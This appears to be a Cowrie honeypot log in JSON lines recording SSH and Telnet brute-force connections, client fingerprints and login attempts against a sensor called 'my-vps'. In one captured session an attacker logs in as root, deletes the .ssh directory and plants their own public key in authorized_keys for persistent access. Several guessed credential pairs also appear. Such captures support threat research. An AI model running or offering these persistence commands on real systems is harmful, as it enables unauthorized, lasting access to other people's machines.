{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50619,"dst_ip":"1.2.3.4","dst_port":23,"session":"90e0607bfafa","protocol":"telnet","message":"New connection: 212.227.125.160:50619 (1.2.3.4:23) [session: 90e0607bfafa]","sensor":"my-vps","timestamp":"2025-09-09T04:18:44.094656Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":35188,"dst_ip":"1.2.3.4","dst_port":22,"session":"beaf8460a1e2","protocol":"ssh","message":"New connection: 103.59.95.12:35188 (1.2.3.4:22) [session: beaf8460a1e2]","sensor":"my-vps","timestamp":"2025-09-09T04:18:52.691179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:18:52.692561Z","src_ip":"103.59.95.12","session":"beaf8460a1e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:18:52.962700Z","src_ip":"103.59.95.12","session":"beaf8460a1e2"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":36588,"dst_ip":"1.2.3.4","dst_port":22,"session":"9979ce3223fc","protocol":"ssh","message":"New connection: 192.210.135.20:36588 (1.2.3.4:22) [session: 9979ce3223fc]","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.028944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.029770Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"password","message":"login attempt [muhammad/password] failed","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.083460Z","src_ip":"103.59.95.12","session":"beaf8460a1e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.139209Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.login.success","username":"root","password":"748159263","message":"login attempt [root/748159263] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.619990Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:18:54.859640Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.860414Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.861223Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:54.971824Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:18:55.286343Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:18:55.287064Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:55.355237Z","src_ip":"103.59.95.12","session":"beaf8460a1e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:18:55.398522Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:55.399447Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":38024,"dst_ip":"1.2.3.4","dst_port":22,"session":"897818fc7267","protocol":"ssh","message":"New connection: 192.210.135.20:38024 (1.2.3.4:22) [session: 897818fc7267]","sensor":"my-vps","timestamp":"2025-09-09T04:18:55.507324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:18:55.508141Z","src_ip":"192.210.135.20","session":"897818fc7267"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:18:55.617717Z","src_ip":"192.210.135.20","session":"897818fc7267"}
{"eventid":"cowrie.session.closed","duration":13.036851406097412,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:56.014179Z","src_ip":"212.227.125.160","session":"c76fb9990869"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:18:56.096132Z","src_ip":"192.210.135.20","session":"897818fc7267"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50915,"dst_ip":"1.2.3.4","dst_port":23,"session":"becd690863c0","protocol":"telnet","message":"New connection: 212.227.125.160:50915 (1.2.3.4:23) [session: becd690863c0]","sensor":"my-vps","timestamp":"2025-09-09T04:18:56.194322Z"}
{"eventid":"cowrie.session.closed","duration":12.918864250183105,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:57.013448Z","src_ip":"212.227.125.160","session":"90e0607bfafa"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:57.207251Z","src_ip":"192.210.135.20","session":"897818fc7267"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50937,"dst_ip":"1.2.3.4","dst_port":23,"session":"b114d6197ed3","protocol":"telnet","message":"New connection: 212.227.125.160:50937 (1.2.3.4:23) [session: b114d6197ed3]","sensor":"my-vps","timestamp":"2025-09-09T04:18:57.211185Z"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":38516,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f7df9826834","protocol":"ssh","message":"New connection: 192.210.135.20:38516 (1.2.3.4:22) [session: 6f7df9826834]","sensor":"my-vps","timestamp":"2025-09-09T04:18:57.315480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:18:57.316378Z","src_ip":"192.210.135.20","session":"6f7df9826834"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:18:57.425640Z","src_ip":"192.210.135.20","session":"6f7df9826834"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:18:57.902490Z","src_ip":"192.210.135.20","session":"6f7df9826834"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:58.012896Z","src_ip":"192.210.135.20","session":"9979ce3223fc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:58.013713Z","src_ip":"192.210.135.20","session":"6f7df9826834"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":52564,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c5549914ebb","protocol":"ssh","message":"New connection: 152.32.190.168:52564 (1.2.3.4:22) [session: 3c5549914ebb]","sensor":"my-vps","timestamp":"2025-09-09T04:19:05.296323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:05.297053Z","src_ip":"152.32.190.168","session":"3c5549914ebb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:05.554041Z","src_ip":"152.32.190.168","session":"3c5549914ebb"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache@123","message":"login attempt [apache/apache@123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:19:06.622317Z","src_ip":"152.32.190.168","session":"3c5549914ebb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:07.881436Z","src_ip":"152.32.190.168","session":"3c5549914ebb"}
{"eventid":"cowrie.session.closed","duration":13.427867650985718,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:09.622092Z","src_ip":"212.227.125.160","session":"becd690863c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51173,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4dd124a74b5","protocol":"telnet","message":"New connection: 212.227.125.160:51173 (1.2.3.4:23) [session: b4dd124a74b5]","sensor":"my-vps","timestamp":"2025-09-09T04:19:09.837793Z"}
{"eventid":"cowrie.session.closed","duration":13.295312643051147,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:10.506452Z","src_ip":"212.227.125.160","session":"b114d6197ed3"}
{"eventid":"cowrie.session.closed","duration":12.398686170578003,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:22.236418Z","src_ip":"212.227.125.160","session":"b4dd124a74b5"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":58340,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e0164f1b6a0","protocol":"ssh","message":"New connection: 92.118.39.62:58340 (1.2.3.4:22) [session: 5e0164f1b6a0]","sensor":"my-vps","timestamp":"2025-09-09T04:19:34.163262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:19:34.164541Z","src_ip":"92.118.39.62","session":"5e0164f1b6a0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:19:34.194912Z","src_ip":"92.118.39.62","session":"5e0164f1b6a0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T04:19:34.286992Z","src_ip":"92.118.39.62","session":"5e0164f1b6a0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:35.319953Z","src_ip":"92.118.39.62","session":"5e0164f1b6a0"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":43636,"dst_ip":"1.2.3.4","dst_port":22,"session":"b958b440d6da","protocol":"ssh","message":"New connection: 211.22.25.164:43636 (1.2.3.4:22) [session: b958b440d6da]","sensor":"my-vps","timestamp":"2025-09-09T04:19:40.247231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:40.247976Z","src_ip":"211.22.25.164","session":"b958b440d6da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:40.487511Z","src_ip":"211.22.25.164","session":"b958b440d6da"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":53774,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c354cb79fb5","protocol":"ssh","message":"New connection: 154.209.4.55:53774 (1.2.3.4:22) [session: 7c354cb79fb5]","sensor":"my-vps","timestamp":"2025-09-09T04:19:41.420672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:41.426042Z","src_ip":"154.209.4.55","session":"7c354cb79fb5"}
{"eventid":"cowrie.login.failed","username":"edu","password":"edu","message":"login attempt [edu/edu] failed","sensor":"my-vps","timestamp":"2025-09-09T04:19:41.491048Z","src_ip":"211.22.25.164","session":"b958b440d6da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:41.625386Z","src_ip":"154.209.4.55","session":"7c354cb79fb5"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"!","message":"login attempt [testuser/!] failed","sensor":"my-vps","timestamp":"2025-09-09T04:19:42.423459Z","src_ip":"154.209.4.55","session":"7c354cb79fb5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:42.733795Z","src_ip":"211.22.25.164","session":"b958b440d6da"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:43.629676Z","src_ip":"154.209.4.55","session":"7c354cb79fb5"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":50702,"dst_ip":"1.2.3.4","dst_port":22,"session":"655cd9aa7c40","protocol":"ssh","message":"New connection: 51.81.118.153:50702 (1.2.3.4:22) [session: 655cd9aa7c40]","sensor":"my-vps","timestamp":"2025-09-09T04:19:48.677972Z"}
